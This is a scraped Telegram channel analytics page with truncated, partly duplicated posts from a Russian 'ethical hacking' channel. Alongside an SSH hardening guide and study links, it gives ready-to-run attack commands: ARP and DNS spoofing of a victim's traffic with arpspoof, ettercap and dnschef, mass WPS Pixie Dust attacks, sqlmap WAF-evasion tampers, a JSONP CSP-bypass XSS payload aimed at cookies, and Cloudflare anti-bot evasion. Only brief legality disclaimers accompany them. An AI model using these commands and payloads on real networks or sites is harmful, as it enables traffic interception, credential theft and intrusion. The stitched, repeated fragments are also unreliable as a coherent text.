CodeGuard: CyberSec Edition
Канал по ИБ и этичному хакингу. Связь: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
Show more📈 Analytical overview of Telegram channel CodeGuard: CyberSec Edition
Channel CodeGuard: CyberSec Edition is an active participant. Currently, the community unites 12 558 subscribers, ranking 10 114 in the Technologies & Applications category and 52 575 in the Russia region.
📊 Audience metrics and dynamics
Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 12 558 subscribers.
According to the latest data from 21 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 516 over the last 30 days and by 12 over the last 24 hours, overall reach remains high.
- Verification status: Not verified
- Engagement rate (ER): The average audience engagement rate is 12.27%. Within the first 24 hours after publication, content typically collects 6.72% reactions from the total number of subscribers.
- Post reach: On average, each post receives 1 539 views. Within the first day, a publication typically gains 843 views.
- Reactions and interaction: The audience actively supports content: the average number of reactions per post is 4.
- Thematic interests: Content is focused on key topics such as codeguard, pysec, docker, grep, контейнер.
📝 Description and content policy
The author describes the resource as a platform for expressing subjective opinions:
“Канал по ИБ и этичному хакингу.
Связь: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
Thanks to the high frequency of updates (latest data received on 22 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.
ssh-keygen -t ed25519 -a 100 -C "your_email@example.com"
Параметр -a 100 усиливает защиту ключа с помощью многораундового шифрования.
Копируем публичный ключ на сервер:
ssh-copy-id user@server
🖥 2. Настройка SSH клиента для удобства и безопасности
Правим файл ~/.ssh/config:
Host myserver
HostName server.example.com
User user
Port 2222
IdentityFile ~/.ssh/id_ed25519
IdentitiesOnly yes
Теперь можно подключаться просто командой ssh myserver. Порт 2222 защищает от стандартных атак на 22-й.
⚙️ 3. Отключение паролей для повышения безопасности
На сервере редактируем /etc/ssh/sshd_config:
PasswordAuthentication no PermitRootLogin no PubkeyAuthentication yes Port 2222Делаем резервную копию файла перед изменением и перезапускаем SSH:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.backup
sudo systemctl restart sshd
🐳 4. Использование шифров и алгоритмов
Для контроля алгоритмов добавим в ~/.ssh/config:
Host myserver
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com
KexAlgorithms curve25519-sha256
Ограничение по криптографии улучшает защиту от устаревших и слабых методов.
📌 5. Включение двухфакторной аутентификации (2FA)
Устанавливаем Google Authenticator на сервер:
sudo apt install libpam-google-authenticator
google-authenticator
Добавляем в /etc/pam.d/sshd строку:
auth required pam_google_authenticator.soИ в sshd_config:
ChallengeResponseAuthentication yes AuthenticationMethods publickey,keyboard-interactiveПерезапускаем SSH. Такая настройка позволит не только надежно шифровать переписку по SSH, но и исключит риски, связанные с паролями, а также повысит общую устойчивость вашей инфраструктуры. 😈 CodeGuard | Chat | #SSH #2FA #DevOps
📕 Книга: «Основы веб-хакинга. Более 30 примеров уязвимостей» Авторы: Peter Yaworski и Eugene Burmakin Год: 2016Если хочешь научиться искать и понимать реальные уязвимости в веб-приложениях — эта книга для тебя. Да, не самая новая, 2016год, но на основе реальных кейсов раскрываются популярные методы этичного хакинга, для основы самое то. 👨💻 Что внутри: - Распространённые уязвимости: XSS, CSRF, RCE и другие - Ошибки в логике и конфигурациях веб-приложений - Манипуляции с HTTP-запросами и open redirect - Поиск багов и участие в багбаунти-программах - Реальные примеры с выплатами и объяснения 💠 Бери книгу → [Archive] 😈 CodeGuard |Chat | #book #webhacking #pentest
Что есть в репозитории: — Теоретическая база по этичному хакингу и тестированию на проникновение — Полный разбор кейсов с реальными примерами успешных атак и контрмер — Подробный курс Linux для хакеров с понятными объяснениями и практикой — Большой список инструментов и скриптов для различных этапов пентеста — Ссылки на учебные материалы, видео, заметки и комьюнити📱 Ресурс на GitHub Универсальный репозиторий, который стоит добавить в закладки каждого пентестера и этичного хакера 😈 CodeGuard | Chat | #pentesting #hacking #opensource
sudo apt install dsniff
# Включить форвардинг пакетов
sudo sysctl -w net.ipv4.ip_forward=1
# ARP-спуфинг между жертвой и роутером
sudo arpspoof -i eth0 -t 192.168.1.5 192.168.1.1
# Подмена DNS по списку из hosts.txt
sudo dnsspoof -i eth0 -f hosts.txt
Содержимое hosts.txt:
example.com 1.2.3.4🟫 ettercap — мощный MITM-инструмент с DNS-spoofing:
sudo apt install ettercap-text-only
sudo sysctl -w net.ipv4.ip_forward=1
sudo ettercap -T -i eth0 -M arp:remote /192.168.1.5/ /192.168.1.1/ -P dns_spoof
- Этот набор команд включает ARP MITM между жертвой и роутером с подменой DNS.
🛜 dnschef — DNS-прокси для легкой подмены:
sudo apt install python3-pip
pip3 install dnschef
sudo dnschef --interface eth0 --fakeip 5.6.7.8 --fakedomains example.com
Всё, что запросит example.com — получит 5.6.7.8.
⚡️ Живые кейсы и трюки: — ARP-спуфинг через arpspoof + dnsspoof для полного контроля DNS-запросов в локальной сети — DNS-подмена в pcap файле через scapy/wireshark для офлайнового анализа — Тестирование резервного сценария при подмене DNS для мобильных и IoT-устройств📚 Полезные обучающие материалы и инструкции: — DNS spoofing с dnsspoof и arpspoof — Пошаговая настройка mitm с DNSspoof — dnschef Применяй эти команды на тестовых стендах и в рамках закона 😈 CodeGuard | Chat
🚨 Какие угрозы создаёт PoisonTap: - Перехват интернет-трафика: устройство ворует куки и сессии миллионов сайтов, включая Google и Facebook. - Кэширование вредоносного кода: в локальный кэш браузера внедряются опасные HTML и JavaScript, создавая бэкдоры, которые сохраняются даже после отключения PoisonTap.Полезные материалы для подробного изучения: — Домашняя страница — GitHub-репозиторий — Статья на Хакере Будьте внимательны с неизвестными USB-устройствами 😈 CodeGuard | Chat
🛠 Основные возможности: - Сканирование точек с включённым WPS - Одновременная атака нескольких целей - Запуск атаки Pixie Dust с автоматическим обходом - Гибкая настройка каналов и целей📥 Установка (пример для Kali Linux):
apt-get install libpcap-dev libssl-dev -y
git clone https://github.com/xXx-stalin-666-money-xXx/penetrator-wps.git
cd penetrator-wps/
./install.sh
penetrator
🚀 Примеры запуска:
— Ручная атака на конкретные цели:
penetrator -i wlan0 -c 1 -b 11:22:33:44:55:66 -e example -b 66:55:44:33:22:11
— Сканирование и атака всех точек на канале 1:
penetrator -i wlan0 -c 1
— Атака всех доступных точек с WPS с использованием Pixie Dust:
penetrator -i wlan0 -A
— Последовательная атака поочерёдно всех точек с WPS:
penetrator -i wlan0 -A -M
⚠️ Важно: Используйте Penetrator-WPS только в легальных целях и в сетях, на которые у вас есть разрешение
📂 Репозиторий на GitHub
😈 CodeGuard | Chat👩💻 Весь курс разбит на ежедневные задачи с ресурсами и материалами. Темы охватывают: — Network+ (основы сетей) — Security+ (принципы безопасности) — Linux (основы и командная строка) — Python (для задач безопасности) — Анализ сетевого трафика — Git (контроль версий) — ELK (логирование и аналитика) — Облачные платформы: GCP, AWS, Azure — Хакинг (этичный и практический) — Составление резюме и поиск работыЭто структурированный и удобный план для любого уровня, помогающий системно осваивать ключевые навыки ИБ. 📱 План обучения 😈 CodeGuard | Chat
sqlmap -u "https://example.com/product?id=1" --tamper=space2comment,chardoubleencode,between --dbms=mysql -v 3
- space2comment заменяет пробелы на комментарии SQL, запутывая фильтры
- chardoubleencode — двойное кодирование символов
- between — альтернативные выражения для операторов
Это помогает преодолеть базовую фильтрацию WAF.
⚡️ Шаг 2. Обход CSP (Content Security Policy) с помощью JSONP и Mutation XSS
Пример обхода через JSONP:
<script src="https://trusted.cdn.com/api/data?callback=alert(document.cookie)//"></script>
Mutation XSS позволяет выполнять полезный скрипт, несмотря на строгую CSP благодаря манипуляциям с DOM.
⚡️ Шаг 3. Обход Cloudflare и антиботов с помощью SeleniumBase и undetected-chromedriver
Python пример:
from seleniumbase import Driver
driver = Driver(uc=True)
driver.open("https://example.com")
driver.wait_for_element("input[name='username']").send_keys("testuser")
driver.wait_for_element("input[type='submit']").click()
driver.quit()
Используйте undetected-chromedriver, чтобы браузер маскировался под обычного пользователя и проходил защиту Cloudflare.
⚡️ Шаг 4. Кастомные payloadы с AI и Mutation XSS для обхода современных WAF
Генерируйте "шумовые" запросы, частично похожие на легитимные, чтобы запутать эвристику фильтров.
📂 Подробнее: probtoplay.com, codeby.net и еще статья на codeby.net
😈 CodeGuard | Chatsqlmap -u "https://example.com/page?id=1" --tamper=space2comment,chardoubleencode,between --dbms=mysql -v 3
- space2comment меняет пробелы в запросах на SQL-комментарии, запутывая фильтры
- Позволяет обойти стандартные фильтры WAF и выполнить SQL-инъекции
🟫 Шаг 2. Обход CSP и XSS-защиты через Mutation XSS и JSONP
<script src="https://trusted.cdn.com/api?callback=alert(document.cookie)//"></script>
- Используется JSONP-запрос, разрешённый политиками CSP, для выполнения скриптов
- Mutation XSS позволяет модифицировать DOM, обходя CSP
🐳 Шаг 3. Обход Cloudflare и антиботов с Selenium и undetected-chromedriver
Пример на Python:
from seleniumbase import Driver
driver = Driver(uc=True)
driver.open("https://example.com")
driver.wait_for_element("input[name='username']").send_keys("testuser")
driver.wait_for_element("input[type='submit']").click()
driver.quit()
- Маскирует браузер, позволяя проходить сложные антибот-механизмы
⚡️ Шаг 4. Кастомные AI-сгенерированные payloadы и шумовые HTTP-запросы
- Генерация запросов, частично похожих на легитимные, для обмана эвристики WAF
- Использование Mutation XSS с динамическими изменениями содержимого
📚 Для самых жестких: — Ru-brightdata.com — Codeby.netЭти методы помогут провести полный, незаметный аудит веб-безопасности и выявить скрытые уязвимости 😈 CodeGuard | Chat
Available now! Telegram Research 2025 — the year's key insights 
